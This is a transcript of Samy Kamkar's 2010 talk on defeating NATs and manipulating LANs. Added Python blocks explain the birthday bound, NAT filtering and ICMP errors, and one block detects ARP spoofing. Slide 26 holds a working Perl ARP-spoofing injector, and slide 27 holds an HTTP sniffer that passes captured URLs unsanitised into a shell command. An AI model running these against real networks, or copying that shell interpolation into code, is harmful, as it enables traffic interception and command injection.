
NETWORK CONQUERING: Advanced LAN Manipulation


Presentation Transcript


  1. NETWORK CONQUERING: Advanced LAN Manipulation
     Samy Kamkar
     July 10, 2010
     LILAX

  2. Who is Samy?
     • Co-Founder of Fonality, IP PBX Company
     • Passionate Developer
     • MySpace XSS Worm author
     • "Narcissistic Vulnerability Pimp" (aka Security Researcher for fun)
     • Lady Gaga aficionado

  3. Why am I talking?
     • Bore you with NATs and how they work
     • Entertain you with pictures
     • Teach unknown "features" of NATs
     • Learn interesting paradoxes of NATs
     • Check out tools to evade NATs
     • I like turtles

  4. This is your network.

  5. This is your network on drugs.

  6. A NAT

  7. Things that went out of style by early 2000 IPs

  8. Onto the anatomy…
     • Goal: penetrating a NAT from another NAT
     • Typical NAT: when a packet is received, it's normally only sent off to a client if it's a packet from a pre-existing connection
     • Thus, there should be no way to create a connection from one NAT to another if the destination NAT doesn't allow unknown incoming packets

  9. Our path for a typical packet.

  10–13. Roadblock: the NAT? Nah…
     • Educate: what is a NAT? How does it work?
       • NAT RFCs 1631, 2663
       • linux-source/net/ipv4/netfilter/nf_nat_*.c
     • Educate: what packets are normally allowed through? Part of what protocols?
       • TCP, RFC 793
         • RFC 5382 (NAT for TCP)
       • UDP, RFC 768
         • RFC 4787 (NAT for UDP)
       • ICMP, RFC 792
         • RFC 5508 (NAT for ICMP)

  14. Educate: the protocols
     • We don't know how to exploit the NAT.
     • Can we exploit the protocol?
     • TCP: only allows packets in from existing connections
     • So what is an "existing connection"?
     • A packet that matches source/dest IP, source/dest port, and seq/ack number (some of which are rewritten by the NAT)

  15. Educate: the protocols
     • We don't know how to exploit the NAT.
     • Can we exploit the protocol?
     • UDP: only allows packets in from existing "connections" (despite being connection-less)
     • So what is an "existing connection"?
     • A packet that matches source/dest IP, source/dest port
     • Wait a second… we know the source/dest IP, and we can control the source/dest ports…
     [Figure: UDP Header]

  16. Our path for a typical packet.

  17. But my NAT munges ports!
     • Well, damn.
     • Some NATs randomize source port
     • 16 bits = 65536 possible ports
     • I can send ~550 packets in 1 second
     • So 65536 packets in 120 seconds

  18. Birthday Paradox: to be 16 again
     • Birthdays happen more often than you think.
     • n = round( sqrt(-2 * ln(1 - probability_of_match)) * sqrt(total_items) )

  19. Birthday Paradox: continued
     • If each side sends 545 random source packets regardless of whether NAT munges ports, there's a 99% chance of collision!
     • 23 people in a room = 50% chance
     • 57 people = 99% chance
     • 366 people = 100% chance
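Worked example for slides 18 and 19, added here and not part of the talk. The closed form on slide 18 is the one-set birthday bound (it is what gives 23 and 57 for a 365-day year), while the 545-packets-per-side figure on slide 19 is the two-set version: each side of the two NATs draws its own random source ports, and a "collision" means some port one side chose equals some port the other side chose. The code computes both, checks the rounded closed form against an exact product, and confirms the 99% figure with a seeded simulation. The numbers are the slides' own; the function names are mine.

```python
import math
import random


def n_for_match(probability_of_match, total_items):
    """Slide 18's closed form: draws needed for a given chance that two of
    them coincide (one-set birthday bound). It rounds, so it can be off by one."""
    return round(math.sqrt(-2 * math.log(1 - probability_of_match))
                 * math.sqrt(total_items))


def exact_match_probability(n, total_items):
    """Exact probability that n uniform draws from total_items values
    contain at least one repeat: 1 - (N/N)((N-1)/N)...((N-n+1)/N)."""
    no_match = 1.0
    for i in range(n):
        no_match *= (total_items - i) / total_items
    return 1.0 - no_match


def smallest_n_for_match(probability_of_match, total_items):
    """Smallest n whose exact match probability reaches the target."""
    n = 1
    while exact_match_probability(n, total_items) < probability_of_match:
        n += 1
    return n


def two_sided_match_probability(n_a, n_b, total_items):
    """Slide 19's situation: side A and side B each pick their own random
    values (source ports) and we want some A value to equal some B value.
    Each of the n_a * n_b pairs matches with probability 1/total_items, so
    the expected number of matches is n_a*n_b/total_items and the chance of
    at least one is about 1 - exp(-n_a*n_b/total_items) (Poisson approximation)."""
    return 1.0 - math.exp(-n_a * n_b / total_items)


def simulate_two_sided(n_a, n_b, total_items, trials=1000, seed=0):
    """Monte Carlo check of two_sided_match_probability with a fixed seed."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        ports_a = {rng.randrange(total_items) for _ in range(n_a)}
        if any(rng.randrange(total_items) in ports_a for _ in range(n_b)):
            hits += 1
    return hits / trials


if __name__ == "__main__":
    print("one set, 365 days, 50%:", n_for_match(0.5, 365), "closed form vs",
          smallest_n_for_match(0.5, 365), "exact")
    print("one set, 365 days, 99%:", n_for_match(0.99, 365), "closed form vs",
          smallest_n_for_match(0.99, 365), "exact")
    print("one set, 65536 ports, 99%:", n_for_match(0.99, 65536))
    print("two sides x 545 packets, 65536 ports:",
          round(two_sided_match_probability(545, 545, 65536), 3), "approx,",
          simulate_two_sided(545, 545, 65536), "simulated")
```

The one-set bound needs about 777 draws to reach 99% on 65536 ports; the two-set bound gets there with roughly 545 per side because there are 545 × 545 chances to collide. For a defender evaluating a port-randomizing NAT, the two-set number is the one that matters.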

  20. True client-server model
     • How do we penetrate the NAT like a true client?
     • Can we exploit the protocol?
     • TCP: only allows packets in from existing connections
       • So what is an "existing connection"?
       • A packet that matches source/dest IP, source/dest port, and seq/ack number (some of which are rewritten by the NAT)
     • UDP: only allows packets in from existing "connections" (despite being connection-less)
       • So what is an "existing connection"?
       • A packet that matches source/dest IP, source/dest port
     • But we don't know the source IP…
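To make the "existing connection" rule on slides 14, 15 and 20 concrete, here is a toy NAT, added as an example and not from the talk or from pwnat. It models the two RFC 4787 behaviours that decide whether the hole punching on slide 19 even needs the birthday trick: how an external port is chosen (mapping) and which outside endpoints may send to it (filtering). All addresses are documentation ranges and the rendezvous server is constructed; hole_punch replays the slide's scenario, with Alice and Bob each contacting the server, learning each other's public endpoint, and then sending to each other.

```python
import random
from collections import namedtuple

# src_ip/src_port/dst_ip/dst_port of one UDP datagram (addresses are constructed)
Packet = namedtuple("Packet", "src_ip src_port dst_ip dst_port")

SERVER = ("192.0.2.10", 3478)  # constructed rendezvous server both peers can reach


class ToyNat:
    """Stateful NAT reduced to the two RFC 4787 behaviours that matter here:
    mapping   - which external port an inside flow gets
                ("endpoint-independent": one port per inside ip:port;
                 "address-and-port-dependent": a new port per destination)
    filtering - which outside endpoints may send to that port
                ("endpoint-independent", "address-dependent",
                 "address-and-port-dependent")."""

    def __init__(self, public_ip, mapping, filtering, seed=0):
        self.public_ip = public_ip
        self.mapping = mapping
        self.filtering = filtering
        self._rng = random.Random(seed)  # deterministic "random" external ports
        self.table = {}    # mapping key -> external port
        self.reverse = {}  # external port -> (inside ip, inside port)
        self.peers = {}    # external port -> set of (outside ip, port) it has sent to

    def _key(self, pkt):
        if self.mapping == "endpoint-independent":
            return (pkt.src_ip, pkt.src_port)
        return (pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port)

    def outbound(self, pkt):
        """Translate an inside->outside datagram, creating state on first use."""
        key = self._key(pkt)
        if key not in self.table:
            ext = self._rng.randrange(1024, 65536)
            while ext in self.reverse:
                ext = self._rng.randrange(1024, 65536)
            self.table[key] = ext
            self.reverse[ext] = (pkt.src_ip, pkt.src_port)
            self.peers[ext] = set()
        ext = self.table[key]
        self.peers[ext].add((pkt.dst_ip, pkt.dst_port))
        return Packet(self.public_ip, ext, pkt.dst_ip, pkt.dst_port)

    def inbound(self, pkt):
        """Return the translated datagram if it matches an 'existing
        connection', or None when the NAT drops it."""
        if pkt.dst_ip != self.public_ip or pkt.dst_port not in self.reverse:
            return None
        known = self.peers[pkt.dst_port]
        if self.filtering == "address-dependent" and \
                pkt.src_ip not in {ip for ip, _ in known}:
            return None
        if self.filtering == "address-and-port-dependent" and \
                (pkt.src_ip, pkt.src_port) not in known:
            return None
        in_ip, in_port = self.reverse[pkt.dst_port]
        return Packet(pkt.src_ip, pkt.src_port, in_ip, in_port)


def hole_punch(mapping, filtering):
    """Slide scenario with both NATs configured the same way.
    Returns (unsolicited_packet_got_through, hole_punched)."""
    nat_a = ToyNat("203.0.113.1", mapping, filtering, seed=1)
    nat_b = ToyNat("198.51.100.1", mapping, filtering, seed=2)
    alice, bob = ("10.0.0.2", 5000), ("10.1.0.2", 6000)

    # 1. Each peer talks to the server, which reports the public ip:port it saw.
    a_pub = nat_a.outbound(Packet(*alice, *SERVER))[:2]
    b_pub = nat_b.outbound(Packet(*bob, *SERVER))[:2]

    # 2. Bob sends to Alice's public endpoint before Alice has sent anything to Bob.
    unsolicited = nat_a.inbound(nat_b.outbound(Packet(*bob, *a_pub))) is not None

    # 3. Alice sends to Bob's public endpoint; then Bob tries again.
    alice_to_bob = nat_b.inbound(nat_a.outbound(Packet(*alice, *b_pub))) is not None
    bob_to_alice = nat_a.inbound(nat_b.outbound(Packet(*bob, *a_pub))) is not None
    return unsolicited, alice_to_bob and bob_to_alice


if __name__ == "__main__":
    for m, f in [("endpoint-independent", "endpoint-independent"),
                 ("endpoint-independent", "address-and-port-dependent"),
                 ("address-and-port-dependent", "address-and-port-dependent")]:
        print(f"mapping={m:28} filtering={f:28} -> {hole_punch(m, f)}")
```

Only the last configuration, where the NAT hands out a fresh external port for every destination, defeats the simple exchange; that is the "my NAT munges ports" case of slide 17, and it is the reason the per-side packet counts on slide 19 exist at all.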

  21–23. True client-server model cont.
     • ICMP: Echo request
       • Requests never penetrate NATs, will never hit a client
     • ICMP: Echo reply
       • Replies only go through from a request
       • We know we can't send a request, never penetrates a NAT
     • ICMP: Time exceeded (traceroute)
       • Only goes through in response to an IP packet
       • Well, all computers can send IP packets
       • How does a time exceeded packet work?
       • Content of packet must contain packet originally sent out
       • We don't know what the server sends out unless we arbitrarily send out fixed packets that we later "respond to"
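The last bullets describe the rule a NAT applies to ICMP errors (RFC 5508): the error's payload quotes the IP header and the first 8 bytes of the datagram that triggered it, and the NAT forwards the error inward only if that quoted datagram matches a translation it already holds. The example below is added here and is not from the talk or from pwnat; it builds such a message from constructed addresses and runs that check. Checksums are left at zero because nothing here goes on the wire.

```python
import socket
import struct

ICMP_TIME_EXCEEDED = 11


def build_time_exceeded(orig_src, orig_sport, orig_dst, orig_dport, proto=17):
    """Constructed ICMP Time Exceeded message: 8-byte ICMP header, then the
    IP header and first 8 bytes (here: UDP ports/length/checksum) of the
    original datagram. Checksums and TTL are placeholders."""
    inner_ip = struct.pack("!BBHHHBBH4s4s",
                           0x45, 0, 28, 0x1234, 0, 1, proto, 0,
                           socket.inet_aton(orig_src), socket.inet_aton(orig_dst))
    inner_l4 = struct.pack("!HHHH", orig_sport, orig_dport, 8, 0)
    icmp_hdr = struct.pack("!BBHI", ICMP_TIME_EXCEEDED, 0, 0, 0)
    return icmp_hdr + inner_ip + inner_l4


def parse_time_exceeded(icmp):
    """Return (proto, src, sport, dst, dport) of the quoted original datagram,
    or None if the message is not a well-formed Time Exceeded with an IPv4
    header and at least 8 bytes of transport header inside."""
    if len(icmp) < 8 + 20 + 8 or icmp[0] != ICMP_TIME_EXCEEDED:
        return None
    inner = icmp[8:]
    ihl = (inner[0] & 0x0F) * 4
    if (inner[0] >> 4) != 4 or ihl < 20 or len(inner) < ihl + 8:
        return None
    proto = inner[9]
    src = socket.inet_ntoa(inner[12:16])
    dst = socket.inet_ntoa(inner[16:20])
    sport, dport = struct.unpack("!HH", inner[ihl:ihl + 4])
    return (proto, src, sport, dst, dport)


def nat_accepts_error(icmp, outbound_flows):
    """The RFC 5508 check: forward the error only if the quoted datagram is
    one this NAT actually translated outbound. outbound_flows holds
    (proto, public src ip, external port, dst ip, dst port) tuples."""
    quoted = parse_time_exceeded(icmp)
    return quoted is not None and quoted in outbound_flows


if __name__ == "__main__":
    # constructed state: the NAT sent one UDP flow out to a server
    flows = {(17, "203.0.113.1", 40000, "192.0.2.10", 3478)}
    matching = build_time_exceeded("203.0.113.1", 40000, "192.0.2.10", 3478)
    unrelated = build_time_exceeded("203.0.113.1", 40000, "192.0.2.10", 53)
    print("quoted flow:", parse_time_exceeded(matching))
    print("forwarded:", nat_accepts_error(matching, flows))
    print("unrelated forwarded:", nat_accepts_error(unrelated, flows))
```

This is why the slide says the server must first send out fixed packets that are later "responded to": an error quoting a datagram the NAT never saw leave is dropped at the check above, and that check is also what a defender should verify a NAT or firewall actually performs.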

  24. A Brief History of Crime

  25. ARP Spoofing

  26. ARP Spoofing – Simple!

     use strict;
     use warnings;
     use Packet::Inject;
     use Packet::Ethernet;
     use Packet::ARP;

     my $device = shift @ARGV or die "usage: $0 <interface>\n";  # interface to inject on

     my $raw = Packet::Inject->new(device => $device);   # inject raw packets!
     my $eth = Packet::Ethernet->new()->encode();        # eth pkt will broadcast
     my $arp = Packet::ARP->new(
         sender_eth => "a:b:c:d:e:f",        # our MAC
         target_eth => "ff:ff:ff:ff:ff:ff",  # broadcast
         sender_ip  => "10.0.0.1",           # ip we're stealing
         target_ip  => "255.255.255.255",    # notifying broadcast
     )->encode();                            # now we have a built packet $arp

     $raw->open();                           # open our device for injection
     $raw->write(packet => $eth . $arp);     # inject!!!
     $raw->close();
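Defender's counterpart to the slide above, added here and not part of the talk: the injected reply on this slide changes which MAC the LAN associates with 10.0.0.1, and that change is exactly what an arpwatch-style monitor catches. The example parses raw Ethernet + ARP frames and alerts when an IP starts claiming a different MAC, or when the ARP sender MAC disagrees with the frame's source MAC. The frames are constructed inside the block (the MACs are made up); build_arp_frame exists only to feed the watcher.

```python
import socket
import struct

ETHERTYPE_ARP = b"\x08\x06"


def mac_bytes(text):
    return bytes.fromhex(text.replace(":", ""))


def mac_text(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_frame(eth_src, sender_mac, sender_ip, target_mac, target_ip, oper=2):
    """Constructed Ethernet + ARP frame (broadcast destination), used only to
    give the watcher something to parse; oper 1 = request, 2 = reply."""
    eth = mac_bytes("ff:ff:ff:ff:ff:ff") + mac_bytes(eth_src) + ETHERTYPE_ARP
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, oper,
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame):
    """Fields a watcher cares about, or None if not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or frame[12:14] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack(
        "!HHBBH6s4s6s4s", frame[14:42])
    if htype != 1 or ptype != 0x0800 or hlen != 6 or plen != 4:
        return None
    return {"oper": oper, "eth_src": mac_text(frame[6:12]),
            "sender_mac": mac_text(sha), "sender_ip": socket.inet_ntoa(spa),
            "target_ip": socket.inet_ntoa(tpa)}


class ArpWatcher:
    """Remembers the first MAC seen for each IP and reports changes."""

    def __init__(self):
        self.seen = {}  # sender IP -> MAC first observed for it

    def observe(self, frame):
        """Return an alert string for a suspicious frame, else None."""
        arp = parse_arp(frame)
        if arp is None:
            return None
        alerts = []
        # A normal stack puts its own MAC in both places; crafted frames often do not.
        if arp["sender_mac"] != arp["eth_src"]:
            alerts.append(f"ARP sender {arp['sender_mac']} != frame source {arp['eth_src']}")
        first = self.seen.setdefault(arp["sender_ip"], arp["sender_mac"])
        if first != arp["sender_mac"]:
            alerts.append(f"{arp['sender_ip']} moved from {first} to {arp['sender_mac']}")
        return "; ".join(alerts) if alerts else None


def run_sample():
    """Constructed traffic: the real gateway answers twice, then forged
    replies claim its IP. Returns one alert (or None) per frame."""
    frames = [
        build_arp_frame("00:11:22:33:44:55", "00:11:22:33:44:55", "10.0.0.1",
                        "66:77:88:99:aa:bb", "10.0.0.7"),          # genuine reply
        build_arp_frame("00:11:22:33:44:55", "00:11:22:33:44:55", "10.0.0.1",
                        "66:77:88:99:aa:bb", "10.0.0.7"),          # same again, fine
        build_arp_frame("0a:0b:0c:0d:0e:0f", "0a:0b:0c:0d:0e:0f", "10.0.0.1",
                        "ff:ff:ff:ff:ff:ff", "255.255.255.255"),   # forged: 10.0.0.1 "moves"
        build_arp_frame("00:11:22:33:44:55", "0a:0b:0c:0d:0e:0f", "10.0.0.1",
                        "ff:ff:ff:ff:ff:ff", "255.255.255.255"),   # forged: MAC fields disagree
    ]
    watcher = ArpWatcher()
    return [watcher.observe(f) for f in frames]


if __name__ == "__main__":
    for i, alert in enumerate(run_sample(), 1):
        print(f"frame {i}: {alert or 'ok'}")
```

The first-seen MAC is a heuristic, not ground truth: on a real network seed the table from DHCP leases or a switch's MAC table, and expect legitimate changes when a host's NIC is replaced or a VRRP gateway fails over.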

  27. Epic Browser Sniffing FTW

     use strict;
     use warnings;
     use Packet::Ethernet;
     use Packet::IP;
     use Packet::TCP;

     # decoder objects, created once and reused in the capture callback
     # (module names for IP/TCP assumed from the Packet library's naming)
     my $eth = Packet::Ethernet->new();
     my $ip  = Packet::IP->new();
     my $tcp = Packet::TCP->new();

     sub callback {
         my ($ud, $hdr, $pkt, $s) = @_;
         $eth->decode($pkt);                             # decode ethernet packet
         if ($eth->type == 0x0800) {                     # 0x0800 == IP packet
             $ip->decode($eth->data);                    # decode IP packet
             if ($ip->proto == 6) {                      # TCP packet
                 $tcp->decode($ip->data);                # decode TCP packet
                 if ($tcp->dest_port == 80) {            # HTTP packet
                     # read HTTP header
                     if ($tcp->data =~ /GET (\S+) HTTP.*?Host: (\S+)/s) {
                         # use applescript to open our browser!
                         system qq{osascript -e 'tell application "Safari" to open location "http://$2$1"'};
                     }
                 }
             }
         }
     }

  28. Q&A A gentleman never asks. A lady never tells.

  29. Fin
     pwnat: samy.pl/pwnat
     chownat: samy.pl/chownat
     Packet: samy.pl/packet
     Samy Kamkar
     www.samy.pl
     samy@samy.pl
     twitter.com/SamyKamkar
